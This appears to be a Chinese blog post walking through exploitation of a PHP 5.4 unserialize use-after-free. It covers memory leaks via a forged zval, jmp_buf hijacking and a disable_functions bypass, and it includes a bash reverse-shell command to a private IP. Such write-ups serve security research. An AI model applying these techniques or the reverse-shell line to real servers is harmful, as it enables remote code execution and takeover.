首頁 >後端開發 >php教程 >Php内存破坏漏洞exp编写和禁用函数绕过

Php内存破坏漏洞exp编写和禁用函数绕过

WBOY
WBOY原創
2016-06-23 13:07:451547瀏覽

php内存破坏漏洞的exp编写和其利用方式

首先看一下原作者的一些思路,drops上有其前两部分的翻译: part 1 part 2 第三部分太监了,不过,也可能是审核没过,因为我看完这三篇文章,也是云里雾里的,特别是第三篇,原作者可能实力太屌,他简单提到的一些利用方式我研究了一段时间还是不能完全理解(然而他给出的post中没有任何细节,都是一个名词代过,真是装逼之大成)。我也试着把第三部分翻译了一下,不太懂英文的同学可以看下。part 3

之后下面我按照我的一些方式来实现对这个漏洞的利用,感谢龙哥提供的写堆栈方法。

环境搭建

原作者用的是php5.4.34,我也是用这个测试的,apache用的最新版。ubuntu32 。 编译php的时候有些坑啊,跟正题没啥关系,不啰嗦了,直接扔个我配置时的脚本吧。。。。

apt-get install gcc g++ make vim libxml2-dev apache2 apache2-devwget http://jp2.php.net/get/php-5.4.34.tar.gz/from/this/mirrortar -xzf mirrorcd php-5.4.34/./configure --with-apxs2=/usr/bin/apxs2make && make installcp php.ini-production /usr/local/lib/php.ini vi /etc/apache2/apache2.confAddType application/x-httpd-php .php .htm .htmla2dismod mpm_eventa2enmod mpm_preforkservice apache2 restart

之后注意一点,我的apache使用php的方式是在php编译时生成了libphp5.so这个lib库,在apache配置里查找这个库的地址,比如我的是/usr/lib/apache2/modules/libphp5.so, 库里的偏移跟你的php的可执行文件的偏移肯定是不一样的,readelf的时候要read这个。

之后gdb调试的时候,建议让apache单线程运行,先source一下/etc/apache2/envvars ,之后gdb apache2 ,r -X,就可以调试了。

漏洞基本原理

该漏洞的基本原理请参照原作blog的第一部分。简述一下就是当序列化字符串中,在同一个生命域中如果出现了俩相同的key值,也就是相同的变量名的话,在反序列化的时候,后面的会把前面的覆盖,而此时前面的那个变量原来申请的内存空间就被free掉了,这时,我们可以通过序列化一个指针,指向hash表,而此时hash表中的那一项仍然指向刚刚被释放掉的变量内存,这样就发生了uaf。

序列化数据结构如下:

  • a – array 4
  • b – Boolean 3
  • d – double 2
  • i – integer 1
  • o - common object
  • r – reference 7
  • s - non-escaped binary string
  • S - escaped binary string 6
  • C - custom object
  • O – class 5
  • N – null 0
  • R - pointer reference
  • U - unicode string

之后我们要泄漏任意内存的话,只要构造一个php的变量数据结构 zval (PHP使用的内部数据结构),之后让其指向我们需要读的内存就可以了。

struct _zval_struct {	/* Variable information */	zvalue_value value;		/* value */	zend_uint refcount__gc;	zend_uchar type;	/* active type */	zend_uchar is_ref__gc;};typedef union _zvalue_value {	long lval;	/* long value */	double dval;	/* double value */	struct {		char *val;		int len;	} str;	HashTable *ht;       /* hash table value */	zend_object_value obj;} zvalue_value;

根据原作在part1中给出的“使用pack() 伪造一个string ZVAL结构”,如下:

  • 类型(例子中用的是unsigned int)
  • 地址(我们想要泄露的地址)
  • 长度(我们想要泄露内存的长度)
  • 参考标志(0)
  • 数据类型(6,代表String类型)

<?php $fakezval = pack(	'IIII',     //unsigned int	0x08048000, //address to leak	0x0000000a, //length of string	0x00000000, //refcount	0x00000006  //data type);

这样我们只要在释放内存之后,立即申请一个假的zval,就可以重新使用这块内存,并读取任意地址了。

泄漏关键函数的地址

首先是确定大小端,之后是泄漏一个对象句柄的地址,这些在原作的part2部分已经有说明,不再赘述。 现在有一个对象句柄的地址了,之后干啥呢,要找到php库的基址。这个简单,只要找一个最小的句柄地址,往前搜就可以了,直到搜到elf的头部 \x7fELF ,这个地址就是基址了。

找到这个基址之后,就是根据elf的文件结构,(查看程序员的自我修养),找到动态节,string table,符号表。这样的话,你想要哪个函数,就在string table里搜这个函数名,之后用这个偏移在符号表里找到函数地址就可以了。真正用的时候,记得加上基址。

接下来到了原作的第三部分,我们现在要找的东西跟原作是一样的:

  • zend_eval_string
  • executor_globals
  • JMP_BUF

zend_eval_string 是为了控制eip后,让他跳到这个地址上执行,这样就能执行任意php代码。 executor_globals这个是为了找到其结构中的jmp_buf,变量名叫bailout,第三部分讲了这些,我就不放原作的图了。 最蛋疼的地方是这个jmp_buf这是我们利用的关键,逆向该函数如下:

mov    0x4(%esp),%eax   //eax == jmp_bufmov    %ebx,(%eax)         //第1个寄存器ebxmov    %esi,0x4(%eax)    //第2个寄存器esimov    %edi,0x8(%eax)   //第3个寄存器edilea    0x4(%esp),%ecxxor    %gs:0x18,%ecxrol    $0x9,%ecxmov    %ecx,0x10(%eax) //第5个寄存器espmov    (%esp),%ecxxor    %gs:0x18,%ecxrol    $0x9,%ecxmov    %ecx,0x14(%eax) //第6个寄存器eipmov    %ebp,0xc(%eax)  //第4个寄存器ebp

所以在jmp_buf里寄存器的排列如下: ebx , esi , edi ,ebp ,esp , eip ,return_addr

我们只要控制eip就好,但是如果其他部分的值不对的话,要么执行完crash,要么直接crash,所以我们还是要把他们恢复出来。原作者已经在part3里说明了其使用了glibc有一个叫PTR_MANGLE宏进行混淆,我们如果要恢复eip和esp话需要先找到set_jmp的返回地址。这个需要找到 php_execute_script 这个函数地址。 具体的破解jmp_buf的方法请参照part3最后的视频部分,原作在其中做了讲解。

我们破解了jmp_buf之后就可以控制eip了,让他跳转到eval函数上执行,就可以执行任意php代码了,并且这种方式非常稳定,不会让apache crash。

写堆栈内存

这部分原作在part3中给出了一种直接写内存的方法,然而那个实在是有些深奥,他也没有仔细说明。这里我提供一种比较蛋疼的写堆栈的方法。

首先说明一下php中内存缓存块这个东西,缓存块在被free掉之后回到链上,当有新变量申请内存时,如果这个块的容量足够,则刚刚被释放的块立即从空闲链上拿下来使用。所以,我们只要先free掉一块内存,之后构造zval让其指向一个缓存块,之后再free掉该指针,之后立即反序列化一个新变量,那么变量的值就写入到刚刚被释放的缓存块中了。这是一种稳定的写堆栈方式。 缓存块的内存结构是这样的: XX 00 00 00 ( 0x10

这样的话,我们只要在jmp_buf的地址前面搜索内存,找到这样一个头部,将其当作缓存块来使用就可以了,比如我搜索其前面0x1000的内存如下:

最好找一些位置距离不是很远的头部来利用,最好是小于600,原理上多大都可以,但是越小越好。很难遇到只覆盖一次的情况,因为大多数头部距离缓存块都大于0x80,但是我们可以连续构造来利用,当我们使用第一个缓存块时,我们把其尾部的八个字节,重写为缓存块头部,如\x88\x00\x00\x00\x01\x00\x00\x00,这样的话,下一次我们就可以从我们重写的这个头部开始重写内存,写入0x80个字节的数据,如果还是没有到达jmp_buf的地址的话,我们同样将尾部构造为缓存块头部,这样一直构造,一直重写,直到将jmp_buf重写为我们需要的布局。这样就完成了利用。

注意事项

首先在payload里,不能出现 0x5c ,就是’',这个地方有点奇怪,如果出现0x5c,反序列会失败,我猜测是转义字符的问题,但是不管是2个0x5c还是4个0x5c都无法正常反序列化,可能跟python的转义有关,因为php反序列化是有字段的长度的,理论上来说,里面出现” ,’,\都不会发生截断,所以出现莫名其妙的反序列失败的时候,要多半儿是这个问题。

第二点,注意一个叫做 old_cwd 的变量,这个变量位于 JMP_BUF 地址前136个字节处,如果这个地址上填充的地址为\00,则会抛出异常,apache会crash,并且,该变量是个指针,load_jmp执行时会在此寻址,所以要求该变量必须是个合法地址,所以我们要在 JMP_BUF 前136字节处填充上jmpbuf的地址就可以了。

进一步利用

我们刚才将eip劫持到了zend_eval_string的入口地址上,这样我们就可以执行任意php代码,并且比较稳定,不会发生crash。 但是这样有局限性,比如我在php.ini中禁用如下函数:

  • system
  • exec
  • passthru
  • escapeshellcmd
  • pcntl_exec
  • shell_exec
  • fsockopen
  • pfsockopen
  • dl
  • popen
  • proc_open
  • php_uname
  • phpinfo
  • disk_free_space
  • disk_total_space

由于eval也是要受配置文件控制的,所以执行payload时会反回如下错误:

这样我们要绕过这个其实很简单,毕竟我们在控制二进制程序流程,怎么玩儿都行。 我一开始想到的方法是构造一个rop链,直接执行shellcode,我用ROPgadgot,用level=5直接搜了libphp5.so,构造出了rop链,但是发现这个利用方式很蛋疼,因为rop链很长,如果用我们刚才那种写栈的方法,每次最多只能写入120个字节,所以很困难。最后我强行调整了rop链在其中加了几段填充字符,用这些填充字符来分割payload,这样多次写入,但是最后exploit的时候还是失败了,不知道是不是哪个偏移没算对,payload一打过去,gdb里apache连报错都没有,直接退出。

之后我就想到,我可以直接调用php中系统命令执行的底层函数。翻了一下php源码,找到其命令执行的函数原型,如下:

/* php_exec * If type==0, only last line of output is returned (exec) * If type==1, all lines will be printed and last lined returned (system) * If type==2, all lines will be saved to given array (exec with &$array) * If type==3, output will be printed binary, no lines will be saved or returned (passthru) * */PHPAPI int php_exec(int type, char *cmd, zval *array, zval *return_value){	FILE *fp;	char *buf;	size_t l = 0;	int pclose_return;	char *b, *d=NULL;	php_stream *stream;	size_t buflen, bufl = 0;#if PHP_SIGCHILD	void (*sig_handler)() = NULL;#endif#if PHP_SIGCHILD	sig_handler = signal (SIGCHLD, SIG_DFL);#endif#ifdef PHP_WIN32	fp = VCWD_POPEN(cmd, "rb");#else	fp = VCWD_POPEN(cmd, "r");#endif	if (!fp) {		php_error_docref(NULL, E_WARNING, "Unable to fork [%s]", cmd);		goto err;	}	stream = php_stream_fopen_from_pipe(fp, "rb");	buf = (char *) emalloc(EXEC_INPUT_BUF);	buflen = EXEC_INPUT_BUF;	if (type != 3) {		b = buf;		while (php_stream_get_line(stream, b, EXEC_INPUT_BUF, &bufl)) {			/* no new line found, let's read some more */			if (b[bufl - 1] != '\n' && !php_stream_eof(stream)) {				if (buflen < (bufl + (b - buf) + EXEC_INPUT_BUF)) {					bufl += b - buf;					buflen = bufl + EXEC_INPUT_BUF;					buf = erealloc(buf, buflen);					b = buf + bufl;				} else {					b += bufl;				}				continue;			} else if (b != buf) {				bufl += b - buf;			}			if (type == 1) {				PHPWRITE(buf, bufl);				if (php_output_get_level() < 1) {					sapi_flush();				}			} else if (type == 2) {				/* strip trailing whitespaces */				l = bufl;				while (l-- > 0 && isspace(((unsigned char *)buf)[l]));				if (l != (bufl - 1)) {					bufl = l + 1;					buf[bufl] = '\0';				}				add_next_index_stringl(array, buf, bufl);			}			b = buf;		}		if (bufl) {			/* strip trailing whitespaces if we have not done so already */			if ((type == 2 && buf != b) || type != 2) {				l = bufl;				while (l-- > 0 && isspace(((unsigned char *)buf)[l]));				if (l != (bufl - 1)) {					bufl = l + 1;					buf[bufl] = '\0';				}				if (type == 2) {					add_next_index_stringl(array, buf, bufl);				}			}			/* Return last line from the shell command */			RETVAL_STRINGL(buf, bufl);		} else { /* should return NULL, but for BC we return "" */			RETVAL_EMPTY_STRING();		}	} else {		while((bufl = php_stream_read(stream, buf, EXEC_INPUT_BUF)) > 0) {			PHPWRITE(buf, bufl);		}	}	pclose_return = php_stream_close(stream);	efree(buf);done:#if PHP_SIGCHILD	if (sig_handler) {		signal(SIGCHLD, sig_handler);	}#endif	if (d) {		efree(d);	}	return pclose_return;err:	pclose_return = -1;	goto done;}

四个参数,前面俩好办,后面俩不想深究,直接看下源码,发现,后面俩参数只有当 type=2 时候才会用到,那就直接用type=0,用 exec 好了。

构造栈:

  • exec_type \x00\x00\x00\x00
  • php_code_addr jmp_buf的地址+44
  • exec_type
  • exec_type
  • php_code bash -c ‘bash -i >& /dev/tcp/192.168.26.125/8818 0>&1’\x00

exploit!如下:

成功反弹shell。

其实后面还有点问题,因为我把shell exit之后,php继续往下执行,结果apache crash掉了。。。。 crash时gdb状态如图:

也没继续往下看,其实已经差不多了,也就是调一下的事儿。

后记

如果大家有更好的思路,或者对原作的利用方式有更深刻的理解,欢迎与我讨论 :-)

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn